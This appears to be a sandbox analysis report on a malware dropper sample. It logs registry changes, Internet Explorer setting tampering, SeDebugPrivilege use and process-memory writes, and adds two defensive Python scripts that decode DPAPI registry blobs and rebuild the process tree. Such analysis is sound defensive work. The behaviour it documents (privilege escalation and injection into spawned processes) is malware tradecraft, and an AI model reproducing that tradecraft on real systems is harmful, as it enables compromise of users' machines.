Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_tnlfdyvqoi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\qnigaysqki.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_qkicausnkf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_axsqkicaus.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\usmkfcxvpn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_usmkfcxvpn.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\tnlfdyvqoi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\kfzxrpkhcz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_zusmkecwup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_ojgbztrljd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temp\i_fdyvqnigay.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "444797372" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab0000000000200000000001066000000010000200000006825e099f7be78400aeca8c813c9be085e9a858333164a16505b30518e556973000000000e80000000020000200000008af9c9b2ee7dbe097e3feb69f214a97a2440b8ae6a3d7ad089e3c84b96e08e6320000000ffd3f30b8f1dd09d1cd12230fc8c4636627b3a1e8a3e7a8107ec2c177697afa240000000c6a849490abc84dc992fc7b5f05aeff8514d8652a893df228a2dd93ff351db7ae6f3d8a2ab451848c90e4ec43076553598a007e1dbc5bfe63144a6f40f072fc3 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3971427848" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00ed3eed2e71db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fcb9c6b319d08342a9ed2bf25da18ab000000000020000000000106600000001000020000000fd4fb3445c6722a2d381e57488e7ab7dddc0478f1ff590dd3e7b754775f67843000000000e80000000020000200000009b3141c7de4da346fa576f75cc308c1b61e8335ea95400ac8d8f14f475115c2420000000702a04fd2665ee90b691713bcbc54dd45e2a75bdb91f65e01f13168992d17daf40000000a8ca3a4edd20bd2e5fa85def9edaffdebcfe3be6d08620b95e6e1f4c21d40c5d6c575366cc3af75a953a2eacdfc3a1db15981c4d04eb5b3d62d686f141a031aa C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0444ded2e71db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{180D4172-DD22-11EF-AF2A-DA67B56E6C1B} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31158574" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3973147440" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
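
The "Set value (data)" rows above carry binary payloads that are easier to triage once decoded: the DecayDateQueue values are DPAPI blobs (the output of CryptProtectData, recognisable by the fixed provider GUID right after the version DWORD), and LastProcessed is a little-endian FILETIME. The following decoder is an added example, not part of the sandbox report; the sample bytes are copied verbatim from the first DecayDateQueue and LastProcessed rows, the function names are mine, and the ALG_ID table covers only the identifiers commonly seen in DPAPI blobs.

```python
"""Decode the binary value data in the registry rows above: DecayDateQueue is a
DPAPI blob (CryptProtectData output) and LastProcessed is a little-endian
FILETIME. Added example, not part of the sandbox report; the sample bytes are
copied from the first DecayDateQueue and LastProcessed rows."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# Every DPAPI blob starts with version 1 followed by this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# CryptoAPI ALG_ID values commonly seen in DPAPI blobs (subset).
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Copied from the DecayDateQueue row, split at the blob's field boundaries.
DECAY_DATE_QUEUE = bytes.fromhex(
    "01000000" "d08c9ddf0115d1118c7a00c04fc297eb"   # version, provider GUID (little-endian)
    "01000000" "fcb9c6b319d08342a9ed2bf25da18ab0"   # master key version, master key GUID
    "00000000" "02000000" "0000"                     # flags, description length, L"" description
    "10660000" "00010000" "20000000"                 # cipher ALG_ID, key bits, salt length
    "6825e099f7be78400aeca8c813c9be085e9a858333164a16505b30518e556973"
    "00000000"                                       # no extra key material
    "0e800000" "00020000" "20000000"                 # hash ALG_ID, hash bits, HMAC key length
    "8af9c9b2ee7dbe097e3feb69f214a97a2440b8ae6a3d7ad089e3c84b96e08e63"
    "20000000"                                       # ciphertext length
    "ffd3f30b8f1dd09d1cd12230fc8c4636627b3a1e8a3e7a8107ec2c177697afa2"
    "40000000"                                       # signature length
    "c6a849490abc84dc992fc7b5f05aeff8514d8652a893df228a2dd93ff351db7a"
    "e6f3d8a2ab451848c90e4ec43076553598a007e1dbc5bfe63144a6f40f072fc3"
)
LAST_PROCESSED = bytes.fromhex("00ed3eed2e71db01")   # copied from the LastProcessed row


def filetime_to_datetime(raw: bytes) -> datetime:
    """8-byte little-endian FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    ticks, = struct.unpack("<Q", raw)
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


def is_dpapi_blob(raw: bytes) -> bool:
    return (len(raw) >= 20 and raw[:4] == b"\x01\x00\x00\x00"
            and uuid.UUID(bytes_le=raw[4:20]) == DPAPI_PROVIDER_GUID)


def parse_dpapi_blob(raw: bytes) -> dict:
    """Walk the blob layout and return its metadata. Ciphertext and signature
    are reported as lengths only: decrypting needs the user's master key
    (identified by master_key_guid), which the report does not contain."""
    if not is_dpapi_blob(raw):
        raise ValueError("not a DPAPI blob")
    off = 20
    mk_version, = struct.unpack_from("<I", raw, off); off += 4
    mk_guid = uuid.UUID(bytes_le=raw[off:off + 16]); off += 16
    flags, descr_len = struct.unpack_from("<II", raw, off); off += 8
    description = raw[off:off + descr_len].decode("utf-16-le").rstrip("\x00"); off += descr_len
    alg_crypt, crypt_bits, salt_len = struct.unpack_from("<III", raw, off); off += 12
    salt = raw[off:off + salt_len]; off += salt_len
    strong_len, = struct.unpack_from("<I", raw, off); off += 4 + strong_len
    alg_hash, hash_bits, hmac_len = struct.unpack_from("<III", raw, off); off += 12 + hmac_len
    data_len, = struct.unpack_from("<I", raw, off); off += 4
    ciphertext = raw[off:off + data_len]; off += data_len
    sign_len, = struct.unpack_from("<I", raw, off); off += 4
    signature = raw[off:off + sign_len]; off += sign_len
    if off != len(raw):
        raise ValueError(f"{len(raw) - off} trailing bytes after blob")
    return {
        "master_key_version": mk_version, "master_key_guid": str(mk_guid),
        "flags": flags, "description": description,
        "cipher": ALG_NAMES.get(alg_crypt, hex(alg_crypt)), "cipher_bits": crypt_bits,
        "salt": salt.hex(), "hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "hash_bits": hash_bits, "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def decode_registry_value(hex_data: str):
    """Classify a 'Set value (data)' payload by its shape."""
    raw = bytes.fromhex(hex_data)
    if is_dpapi_blob(raw):
        return "dpapi", parse_dpapi_blob(raw)
    if len(raw) == 8:
        return "filetime", filetime_to_datetime(raw)
    return "raw", raw.hex()
```

Run against the rows above, the DecayDateQueue blob reports AES-256 with SHA-512 and a 32-byte ciphertext protected under master key b3c6b9fc-d019-4283-a9ed-2bf25da18ab0, which is the usual shape of Internet Explorer's own new-tab-page bookkeeping rather than anything the dropper wrote; the first LastProcessed value decodes to 2025-01-28 02:47:10 UTC on the analysis VM's clock, and its high 32 bits equal the LastCheckForUpdateHighDateTime value in the same table, which is how those two VersionManager integers relate to a FILETIME.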

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target Events
N/A N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe N/A 52
N/A N/A C:\Temp\dxvpnifaysqkicav.exe N/A 12

Suspicious behavior: LoadsDriver

Description Indicator Process Target Events
N/A N/A N/A N/A 20

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Temp\i_kicavpnhfa.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_kfzxrpkhcz.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zusmkecwup.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zxrpjhczur.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_trljebwuom.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_ojgbztrljd.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_oigtqljdbv.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_fdyvqnigay.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_axsqkicaus.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_usmkfcxvpn.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_zxspkicamk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_xrpjhczusm.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_uomgezwroj.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_rljdbwtomg.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_wqoigbytql.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_tnlfdyvqoi.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_qnigaysqki.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_qkicausnkf.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_upnhfzxspk.exe N/A
Token: SeDebugPrivilege N/A C:\Temp\i_smkecwupmh.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2680 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 3840 wrote to memory of 2616 N/A C:\Temp\kfzxrpkhcz.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2012 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4644 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 4408 wrote to memory of 1556 N/A C:\Temp\zusmkecwup.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1796 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2024 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 3856 wrote to memory of 3852 N/A C:\Temp\zxrpjhczur.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2404 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1508 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 2224 wrote to memory of 940 N/A C:\Temp\trljebwuom.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 1368 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3864 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 628 wrote to memory of 4412 N/A C:\Temp\ojgbztrljd.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4340 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2008 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 2008 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
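
The WriteProcessMemory rows are the closest thing this report offers to a process tree: each parent writes into a child it has just created, and the report lists each parent/child pair up to three times. The script below is an added example, not part of the report; it parses an excerpt copied from the table above, collapses the repeats into single edges with a write count, and renders the tree. The function names are mine, and PIDs that never appear as a target (such as 4580, whose creation by CreateProcess.exe is not in the table) are reported as extra roots rather than guessed at.

```python
"""Rebuild the parent/child process tree from the 'Suspicious use of
WriteProcessMemory' rows above. Added example, not part of the report;
SAMPLE_ROWS is an excerpt copied from that table."""
import ntpath
import re
from collections import Counter, defaultdict

# One table row: source PID, target PID, then the two image paths. Paths can
# contain spaces, so match them by their drive letter and ".exe" suffix.
ROW_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) N/A "
    r"(?P<src_img>[A-Za-z]:\\.*?\.exe) (?P<dst_img>[A-Za-z]:\\.*?\.exe)$",
    re.IGNORECASE,
)

SAMPLE_ROWS = r"""
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Temp\dxvpnifaysqkicav.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2624 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 3468 wrote to memory of 2100 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 3824 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 4580 wrote to memory of 3588 N/A C:\Temp\kicavpnhfa.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
PID 864 wrote to memory of 4128 N/A C:\Temp\dxvpnifaysqkicav.exe C:\temp\CreateProcess.exe
"""


def parse_rows(text):
    """One (src_pid, dst_pid, src_image, dst_image) tuple per matching row."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"]))
    return edges


def build_tree(edges):
    """Collapse repeated parent->child rows into one edge, keeping the write
    count per pair and the image path seen for each PID."""
    children = defaultdict(list)
    images = {}
    writes = Counter()
    for src, dst, src_img, dst_img in edges:
        images[src], images[dst] = src_img, dst_img
        if dst not in children[src]:
            children[src].append(dst)
        writes[(src, dst)] += 1
    return children, images, writes


def roots(children):
    """PIDs that never appear as a target: the real root plus any parent whose
    own creation the table does not record."""
    targets = {c for kids in children.values() for c in kids}
    return sorted(p for p in children if p not in targets)


def spawn_summary(children, images):
    """Distinct children per (parent image, child image) pair."""
    summary = Counter()
    for parent, kids in children.items():
        for kid in kids:
            summary[(ntpath.basename(images[parent]), ntpath.basename(images[kid]))] += 1
    return summary


def render(children, images, writes, pid, depth=0):
    """Indented text tree rooted at pid, one line per process."""
    lines = [f"{'  ' * depth}{pid}  {images[pid]}"]
    for kid in children.get(pid, []):
        sub = render(children, images, writes, kid, depth + 1)
        sub[0] += f"  [{writes[(pid, kid)]} writes from {pid}]"
        lines.extend(sub)
    return lines


if __name__ == "__main__":
    ch, im, wr = build_tree(parse_rows(SAMPLE_ROWS))
    for root in roots(ch):
        print("\n".join(render(ch, im, wr, root)))
```

Over the full table, spawn_summary shows dxvpnifaysqkicav.exe (PID 864) creating thirteen CreateProcess.exe instances before the table is cut off, while each randomly named worker (kicavpnhfa.exe, kfzxrpkhcz.exe, ...) creates exactly one, which is the run/release/install loop visible in the Processes section.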

Processes

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe

